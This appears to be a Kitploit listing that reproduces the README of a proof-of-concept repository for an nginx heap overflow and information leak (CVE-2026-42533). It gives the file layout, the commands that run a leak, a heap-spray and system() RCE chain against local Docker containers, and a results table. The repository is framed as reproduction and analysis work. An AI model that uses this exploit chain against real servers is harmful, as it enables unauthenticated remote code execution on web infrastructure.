Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-42533 — إعادة إنتاج لإثبات المفهوم لتجاوز سعة الكومة وتسريب معلومات في nginx (CVE-2026-42533) مع سطحَي هجوم وتحليل تنقيح الأخطاء وسلسلة RCE كاملة. | Kitploit
أدوات/GitHubGitHub/jelasin/cve-2026-42533
التحليل الديناميكي (عزل)تحليل الثغرات الأمنيةتحليل الكودالاستغلالمصممي الأخطاءأمن الويباستغلال الملفات الثنائية
GitHubjelasin/cve-2026-42533

CVE-2026-42533

إعادة إنتاج لإثبات المفهوم لتجاوز سعة الكومة وتسريب معلومات في nginx (CVE-2026-42533) مع سطحَي هجوم وتحليل تنقيح الأخطاء وسلسلة RCE كاملة.

عرض المستودع
1منذ 22 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-42533 — استبدال الالتقاط ثنائي المرور في nginx (two-pass capture clobbering)

nginx (0.9.6–1.30.3 / mainline ≤1.31.2) — تجاوز سعة كومة قبل المصادقة (pre-auth heap overflow) وتسريب معلومات في محرك السكربتات ذات القيم المعقدة؛ CVSS 9.2. لنفس السبب الجذري سطحا هجوم: HTTP (regex location + regex map) و stream (ssl_preread + SNI + regex map).

التحليل الفني المعمق والتصويبات في ANALYSIS.md.

هيكل المشروع

root@kitploit:~
.
├── ANALYSIS.md            # 深度分析(根因 / 两遍执行 / 动态证据 / RCE 链路 + 勘误)
├── README.md              # 本文件(索引)
├── http/                  # ① HTTP 变体黑盒复现(classmethod 触发面)
│   ├── nginx.conf             #   漏洞配置(regex location + regex map)
│   ├── docker-compose.yml     #   nginx:1.30.3(vuln,:8081) vs 1.30.4(fixed,:8082)
│   ├── test.sh                #   clobber / overflow / leak 三方向测试
│   └── repro.py               #   PoC,自动提取泄漏的堆指针/残留数据
├── debug/                # ② HTTP 变体 debug 构建 + pwndbg/gdb 动态分析
│   ├── Dockerfile(.buster) / docker-compose.yml(.buster) / nginx.debug.conf
│   ├── gdb.py                 #   两遍执行追踪 + LEN/VALUE 不一致告警(核心)
│   ├── attach.sh / extract-symbols.sh / trace_one.sh
│   ├── recon/                 #   堆布局侦察脚本(recon.py / recon2/4/5.py)
│   └── README.md              #   详见该目录
└── stream-rift/          # ③ stream 变体完整 RCE 链(已复现 echo pwned)
    ├── Dockerfile / docker-compose.yml / nginx.conf / server.py / entrypoint.sh
    ├── poc.py                 #   完整链(泄漏→喷射→伪造 pool→system),技术来自公开披露
    └── README.md              #   归属声明 + 运行说明

debug/src وdebug/symbols* وdebug/logs* تُنشأ بواسطة extract-symbols.sh (ثنائيات DWARF + شجرة المصدر)، وهي مدرجة في .gitignore ويمكن إعادة بناؤها.

المكونات الثلاثة

① متغير HTTP — إعادة إنتاج الصندوق الأسود (clobber / overflow / leak)

root@kitploit:~
cd http
docker compose up -d                       # 1.30.3(vuln) + 1.30.4(fixed)
./test.sh                                  # 三方向对比
python3 repro.py --vuln http://localhost:8081 --fixed http://localhost:8082   # 解析泄漏

② متغير HTTP — بناء debug + تحليل ديناميكي باستخدام pwndbg

root@kitploit:~
cd debug
docker compose build && docker compose up -d           # debug 构建(--with-debug + DWARF)
./extract-symbols.sh                                    # 拉二进制+源码到本机供 gdb
./attach.sh                                             # gdbserver 附着 worker(:2333)
gdb -x gdb.py                                           # pwndbg 加载;c 后从宿主发请求

انظر debug/README.md.

③ متغير stream — RCE كامل (echo pwned > /tmp/pwn)

root@kitploit:~
cd stream-rift
docker compose build && docker compose up -d            # nginx 1.31.1 (jammy/glibc2.35)
python3 poc.py --host 127.0.0.1 --port 29443 --leak                       # 泄漏 heap/libc/system
python3 poc.py --host 127.0.0.1 --port 29443 --cmd 'echo pwned > /tmp/pwn'
docker compose exec nginx-rce cat /tmp/pwn              # → pwned(属主 nobody = worker)

التقنية منسوبة إلى الإفصاح العام DepthFirstDisclosures/Nginx-Rift؛ التفاصيل في stream-rift/README.md.

ملخص النتائج

السلسلة الكاملة لمتغير stream تعمل على glibc 2.35 الحديث (بدون الحاجة إلى تليين): توزيع cleanup يسبق free() في ngx_destroy_pool، وينفذ system() قبل abort. الموثوقية "جزئية" (heap feng shui، إصابة واحدة تقريبًا من 1–2 محاولة، تتطلب إعادة المحاولة)؛ الإزاحات مثبتة على هذا البناء.

المتطلبات الأساسية

Docker + Compose؛ gdb محلي (+ pwndbg، حمّله بالطريقة التي تفضلها)؛ pip install requests (http/repro.py).

تنزيل الأداة
التأثيرمتغير HTTPمتغير stream
تسريب معلومات (heap/PIE + بيانات متبقية)✅ مستقر✅ مستقر
DoS (إجهاض العامل)✅ مستقر✅ مستقر
تنفيذ تعسفي للكود❌ لا يوجد PoC عام (هندسة مستقلة)✅ تم إعادة إنتاجه (stream-rift/)